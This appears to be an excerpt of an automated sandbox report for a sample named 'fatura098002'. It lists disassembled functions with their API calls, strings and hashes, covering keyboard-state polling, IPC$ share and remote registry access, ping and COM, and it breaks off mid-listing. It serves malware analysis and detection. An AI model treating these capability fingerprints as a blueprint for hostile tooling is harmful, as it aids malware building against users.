Function 007696E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0074F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00769717
LoadStringW.USER32(00000000,?,0074F7F8,00000001), ref: 00769720

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0074F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00769742
LoadStringW.USER32(00000000,?,0074F7F8,00000001), ref: 00769745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00769866

Strings

^ ERROR, xrefs: 007697FB
Line %d:, xrefs: 007697A0
%s (%d) : ==> %s: %s %s, xrefs: 0076984A
Line %d (File "%s"):, xrefs: 0076978F
Error: , xrefs: 0076981D

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 371250fe050b96140c31065873380b78fb0e2ed48a1bd3757b11a852da7ec09f
Instruction ID: 26db274c84819ea8eb4ccda4237c5c9c7596fd87550abecee272c4af6ba117c7
Opcode Fuzzy Hash: 371250fe050b96140c31065873380b78fb0e2ed48a1bd3757b11a852da7ec09f
Instruction Fuzzy Hash: D8412072800209EADF05EBE0DD8ADEEB7BCAF55340F504165F606720D2EA396F49CB61

Function 007606DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007607A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007607BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007607DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00760804
CLSIDFromString.COMBASE(?,000001FE), ref: 0076082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00760837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0076083C

Strings

\IPC$, xrefs: 00760784
SOFTWARE\Classes\, xrefs: 0076070E
\CLSID, xrefs: 00760724

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: b52c543ed3ebcce4b36b873c1b670d74e7fc6bb1f59038d1a40d62b004afa4e6
Instruction ID: 23cc874d35b3c49e411c822c83072b33a7bd24aa61e1ec7bd50991b0f9a792e4
Opcode Fuzzy Hash: b52c543ed3ebcce4b36b873c1b670d74e7fc6bb1f59038d1a40d62b004afa4e6
Instruction Fuzzy Hash: 19410B71C10229EBDF15EB94DC99DEEB7B8FF04350F144269E905A31A1EB386E44CB90

Function 00777A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00777AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00777B8F
SHGetDesktopFolder.SHELL32(?), ref: 00777BA3
CoCreateInstance.COMBASE(0079FD08,00000000,00000001,007C6E6C,?), ref: 00777BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00777C74
CoTaskMemFree.COMBASE(?), ref: 00777CCC
SHBrowseForFolderW.SHELL32(?), ref: 00777D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00777D7A
CoTaskMemFree.COMBASE(00000000), ref: 00777D81
CoTaskMemFree.COMBASE(00000000), ref: 00777DD6
CoUninitialize.COMBASE ref: 00777DDC

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: dbc452b1a6e2852c8cfe478c7f3efcd8c6cb84afeee4bc5e8097e324b6f1280c
Instruction ID: c51e37ae4893015bcfce43af7bdb4f0a4c68132548d98a9c574775d09573e6dd
Opcode Fuzzy Hash: dbc452b1a6e2852c8cfe478c7f3efcd8c6cb84afeee4bc5e8097e324b6f1280c
Instruction Fuzzy Hash: 14C12A75A04209EFCB14DFA4C888DAEBBF9FF48344B148599E9199B361D734EE41CB90

Function 0079541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00795504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00795515
CharNextW.USER32(00000158), ref: 00795544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00795585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0079559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007955AC

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 01b13650172703bd5edb439787fbb0250329a7f514c9f2c8613483d67380bf87
Instruction ID: d4144efd9e7754c10866397a45ce64137bdc712764165a7a55448511115bbeaf
Opcode Fuzzy Hash: 01b13650172703bd5edb439787fbb0250329a7f514c9f2c8613483d67380bf87
Instruction Fuzzy Hash: 44619F71900628EFDF12DF94EC84DFE7BB9EB05720F108145F925AB2A1D7789A81DB60

Function 0075FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0075FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0075FB08
VariantInit.OLEAUT32(?), ref: 0075FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0075FB3A
VariantCopy.OLEAUT32(?,?), ref: 0075FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0075FBA1
VariantClear.OLEAUT32(?), ref: 0075FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0075FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0075FBCC
VariantClear.OLEAUT32(?), ref: 0075FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0075FBE9

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 9af35fe439dd47a8544756815d9f6f6fa085c0c35382b09a84454850caefa49d
Instruction ID: 7b22d9331cd46bdef6464ca02f061898f1227d8cee1339765ff1f5849b513e95
Opcode Fuzzy Hash: 9af35fe439dd47a8544756815d9f6f6fa085c0c35382b09a84454850caefa49d
Instruction Fuzzy Hash: 43415F75A00219DFCF01DF68C8589EEBBB9EF08355F00C069E905A7261CB78A946CFA1

Function 00769C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00769CA1
GetAsyncKeyState.USER32(000000A0), ref: 00769D22
GetKeyState.USER32(000000A0), ref: 00769D3D
GetAsyncKeyState.USER32(000000A1), ref: 00769D57
GetKeyState.USER32(000000A1), ref: 00769D6C
GetAsyncKeyState.USER32(00000011), ref: 00769D84
GetKeyState.USER32(00000011), ref: 00769D96
GetAsyncKeyState.USER32(00000012), ref: 00769DAE
GetKeyState.USER32(00000012), ref: 00769DC0
GetAsyncKeyState.USER32(0000005B), ref: 00769DD8
GetKeyState.USER32(0000005B), ref: 00769DEA

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 2474b1afed8430ab411974f4441de308d9e8c9537f3633646d3a5a1165687641
Instruction ID: f5d31bc046defc056a1d08f4199f3254063977160d47fb6757a94daa01873af4
Opcode Fuzzy Hash: 2474b1afed8430ab411974f4441de308d9e8c9537f3633646d3a5a1165687641
Instruction Fuzzy Hash: 204195346047C969FF71977488043B5BEA86F11344F08806ADFC7566C2EBBD99D8CBA2

Function 00701410 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00701459
OleUninitialize.OLE32(?,00000000), ref: 007014F8
UnregisterHotKey.USER32(?), ref: 007016DD
DestroyWindow.USER32(?), ref: 007424B9
FreeLibrary.KERNEL32(?), ref: 0074251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0074254B

Strings

close all, xrefs: 00701454
>v, xrefs: 00701542, 00701627

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: >v$close all
API String ID: 469580280-912811853
Opcode ID: d297cac7f3367c53706756e1d02279307aeea89853a76a84c89e7aa55c61987c
Instruction ID: f225435ddba99d44023a49359209108f4b5b64642c4f2af3381738137a175030
Opcode Fuzzy Hash: d297cac7f3367c53706756e1d02279307aeea89853a76a84c89e7aa55c61987c
Instruction Fuzzy Hash: B2D18031701212CFCB19DF14C899A29F7A0BF05710F9542ADF54AAB2A2DB39AD23CF55

Function 0078055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 007805BC
inet_addr.WS2_32(?), ref: 0078061C
gethostbyname.WS2_32(?), ref: 00780628
IcmpCreateFile.IPHLPAPI ref: 00780636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007806C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007806E5
IcmpCloseHandle.IPHLPAPI(?), ref: 007807B9
WSACleanup.WS2_32 ref: 007807BF

Strings

Ping, xrefs: 00780676

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 373271149fbdd1d0dd8e1077a6b02c6d622ba608bb1718982c988743d6b28658
Instruction ID: c7a0120e5cebd1424a696a18a00c80bfd8b2ee7e3287fa9833a82ae6be5769b3
Opcode Fuzzy Hash: 373271149fbdd1d0dd8e1077a6b02c6d622ba608bb1718982c988743d6b28658
Instruction Fuzzy Hash: 5091AE75648201DFDB60EF15C889F1ABBE0AF44318F1485A9F4698B6A2C738ED49CFD1

Function 00788CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00788CF3

Part of subcall function 00768E54: _wcslen.LIBCMT ref: 00768E77

_wcslen.LIBCMT ref: 00788D4E
_wcslen.LIBCMT ref: 00788D9C
_wcslen.LIBCMT ref: 00788DDC
_wcslen.LIBCMT ref: 00788E6E

Strings

none, xrefs: 00788E65, 00788E6A
cdecl, xrefs: 00788D48, 00788D4D
stdcall, xrefs: 00788DD6, 00788DDB
winapi, xrefs: 00788D96, 00788D9B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: a5763269371a4161ef9e3c7b8d3a51312bc2df051f431a84c3a9023ef4861696
Instruction ID: 1dfddc807f1dc8bcfcdcad7b18fb241a28fc89db6771fe7d7b6bea0a02011201
Opcode Fuzzy Hash: a5763269371a4161ef9e3c7b8d3a51312bc2df051f431a84c3a9023ef4861696
Instruction Fuzzy Hash: D551A131A40116DBCF54EF6CC9409BEB7A5BF64320BA04229E966E72C5DF39ED40C791

Function 0078372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00783774
CoUninitialize.COMBASE ref: 0078377F
CoCreateInstance.COMBASE(?,00000000,00000017,0079FB78,?), ref: 007837D9
IIDFromString.COMBASE(?,?), ref: 0078384C
VariantInit.OLEAUT32(?), ref: 007838E4
VariantClear.OLEAUT32(?), ref: 00783936

Strings

Invalid parameter, xrefs: 00783865
NULL Pointer assignment, xrefs: 0078381E
Failed to create object, xrefs: 007837E4, 0078389A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: d460747b8e8983a7fe946b6e3f8cde8759cc85572ea4fcb8800bbc09802f3ea6
Instruction ID: 7770f843ac728c275ff6a0ce26a828f0fab50d5040a1416f170152c740f895f9
Opcode Fuzzy Hash: d460747b8e8983a7fe946b6e3f8cde8759cc85572ea4fcb8800bbc09802f3ea6
Instruction Fuzzy Hash: 2561AFB0648301EFD711EF58C889F5AB7E4AF48B14F00490DF9859B291C778EE49CBA2

Function 00773388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007733CF

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007733F0

Strings

Incorrect parameters to object property !, xrefs: 007734AB
^ ERROR , xrefs: 0077349E
Line %d (File "%s"):, xrefs: 00773443, 0077345C
"%s" (%d) : ==> %s:, xrefs: 00773522
Error: , xrefs: 007734D1
"%s" (%d) : ==> %s:%s%s, xrefs: 00773504

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 9efccbfcccb7797074200fef8c27b5117bafe5f43bba2f0fb23d0c5d19047f38
Instruction ID: aa51ea5d01d598275fa91dea30586a66d44d85e1edf511e47c8c8d3dc850a316
Opcode Fuzzy Hash: 9efccbfcccb7797074200fef8c27b5117bafe5f43bba2f0fb23d0c5d19047f38
Instruction Fuzzy Hash: 8B5171B1900209FADF15EBA0CD4AEEEB7B8AF04340F508165F50972092EB3D6F58DB60

Function 0076B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0076B5FC
_wcslen.LIBCMT ref: 0076B608
_wcslen.LIBCMT ref: 0076B64D
_wcslen.LIBCMT ref: 0076B68C
_wcslen.LIBCMT ref: 0076B6C7

Strings

APPEND, xrefs: 0076B6C1, 0076B6C6
REMOVE, xrefs: 0076B602, 0076B607
EXISTS, xrefs: 0076B686, 0076B68B
KEYS, xrefs: 0076B647, 0076B64C

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 323fdb88201348138236a2d5996aedc034d95f7cb8a88d7c8b7b1ed18d09b92f
Instruction ID: 9111635bd56c85edba8e26b66429aa0cd1fe4117225a41069758eb6e418004d3
Opcode Fuzzy Hash: 323fdb88201348138236a2d5996aedc034d95f7cb8a88d7c8b7b1ed18d09b92f
Instruction Fuzzy Hash: 8B41D832A00126DBCB105F7DC9905BE77A5AFA2754B24422AEC63D7284E739DDC1C790

Function 00775393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007753A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00775416
GetLastError.KERNEL32 ref: 00775420
SetErrorMode.KERNEL32(00000000,READY), ref: 007754A7

Strings

READONLY, xrefs: 00775452
UNKNOWN, xrefs: 00775444
READY, xrefs: 00775460, 00775468
NOTREADY, xrefs: 0077544B
INVALID, xrefs: 00775459

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: a821326abd67c0fa85d0838089507150ed4c7821798a1f23694b5bf43d732e0c
Instruction ID: af0864432465c63b1930fb141332c55fa70db03dbd663425b4af44c4609245f5
Opcode Fuzzy Hash: a821326abd67c0fa85d0838089507150ed4c7821798a1f23694b5bf43d732e0c
Instruction Fuzzy Hash: 9D319075A00544DFDF10DF68C488EAA7BB4EF05345F14C169E50ACB292DBB9DD82CBA1

Function 00793A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

